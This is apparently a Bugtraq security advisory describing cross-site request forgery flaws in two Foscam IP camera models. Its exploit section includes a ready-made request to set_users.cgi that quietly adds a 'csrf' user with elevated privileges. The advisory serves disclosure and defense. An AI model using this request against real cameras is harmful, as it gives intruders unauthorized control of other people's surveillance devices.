Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
BID:58943
Info
Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
| Bugtraq ID: | 58943 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2013 12:00AM |
| Updated: | Apr 09 2013 12:00AM |
| Credit: | shekyan |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
The following products are vulnerable:
Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3
Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
The following products are vulnerable:
Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3
Exploit / POC
Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
To exploit these issues an attacker must entice an unsuspecting victim to visit a malicious webpage.
The following example URI is available:
http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
To exploit these issues an attacker must entice an unsuspecting victim to visit a malicious webpage.
The following example URI is available:
http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
Solution / Fix
Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities
References:
References:
- Foscam Product Page (Foscam Digital Technologies)
- IP Camera CGI V1.27 (Foscam Digital Technologies)